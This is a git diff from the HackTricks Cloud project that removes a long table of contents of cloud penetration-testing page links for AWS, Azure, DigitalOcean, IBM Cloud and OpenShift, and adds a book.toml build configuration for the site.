Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) - * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) - * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) - * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) - * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) - * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) - * [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) - * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) - * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) - * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) - * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) - * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) - * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) - * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) - * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) - * [AWS - S3 Post 
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) - * [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) - * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) - * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) - * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) - * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) - * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) - * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) - * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) - * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) - * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) - * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) - * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) - * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) - * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) - * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) - * [iam:PassRole, 
codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) - * [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) - * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) - * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) - * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) - * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) - * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) - * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) - * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) - * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) - * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) - * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) - * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) - * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) - * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) - * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) - * [AWS - Glue 
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) - * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) - * [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) - * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) - * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) - * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) - * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) - * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) - * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) - * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) - * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) - * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) - * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) - * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) - * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) - * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) - * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) - * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) - * [AWS - 
SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) - * [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) - * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) - * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) - * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) - * [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) - * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) - * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) - * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) - * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) - * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) - * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) - * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) - * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) - * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) - * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) - * [AWS - Security Hub 
Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) - * [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) - * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) - * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) - * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) - * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) - * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) - * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) - * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) - * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) - * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) - * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) - * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) - * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) - * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) - * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) - * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) - * [AWS - EC2, 
EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) - * [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) - * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) - * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) - * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) - * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) - * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) - * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) - * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) - * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) - * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) - * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) - * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) - * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) - * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) - * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) - * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) - * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) - * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) - * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) - * [AWS - Relational Database (RDS) 
Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) - * [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) - * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) - * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) - * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) - * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) - * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) - * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) - * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) - * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) - * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) - * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) - * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) - * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) - * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) - * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) - * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) - * [AWS - DynamoDB Unauthenticated 
Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) - * [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) - * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) - * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) - * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) - * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) - * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) - * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) - * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) - * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) - * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) - * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) - * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) - * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) - * [AWS - RDS Unauthenticated 
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) - * [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) - * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) - * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) - * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) -* [Azure Pentesting](pentesting-cloud/azure-security/README.md) - * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) - * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) - * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) - * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) - * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) - * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) - * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) - * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) - * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) - * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) - * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) - * [Az - Application 
Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) - * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - * [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) - * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) - * [Az - App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) - * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) - * [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md) - * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) - * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) - * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) - * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) - * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) - * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) - * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) - * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) - * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) - * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) - * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) - * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) - * [Az AD Connect - Hybrid 
Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) - * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) - * [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) - * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) - * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) - * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) - * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) - * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) - * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) - * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) - * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) - * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) - * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) - * [Az - Phishing Primary Refresh Token (Microsoft 
Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) - * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) - * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) - * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) - * [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) - * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) - * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) - * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - * [Az - App Services 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - * [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) - * [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) - * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) - * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) -* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) - * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) - * [DO - Permissions for a 
Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) - * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) - * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) - * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) - * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) - * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) - * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) - * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) - * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) - * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) - * [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) - * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) - * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) -* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) - * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) - * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) - * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) -* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) - * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) - * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) - * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) - * [OpenShift - Jenkins Build Pod 
Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md)
- * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md)
- * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md)
- * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md)
- * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md)
-
-## 🛫 Pentesting Network Services
-
-* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network)
-* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh)
diff --git a/book.toml b/book.toml
new file mode 100644
index 000000000..4add3bde9
--- /dev/null
+++ b/book.toml
@@ -0,0 +1,44 @@
+[book]
+authors = ["Carlos Polop"]
+language = "en"
+multilingual = false
+src = "src"
+title = "HackTricks Cloud"
+
+[build]
+create-missing = false
+extra-watch-dirs = ["translations"]
+
+[preprocessor.alerts]
+after = ["links"]
+
+[preprocessor.reading-time]
+
+[preprocessor.pagetoc]
+
+[preprocessor.tabs]
+
+[preprocessor.codename]
+
+[preprocessor.hacktricks]
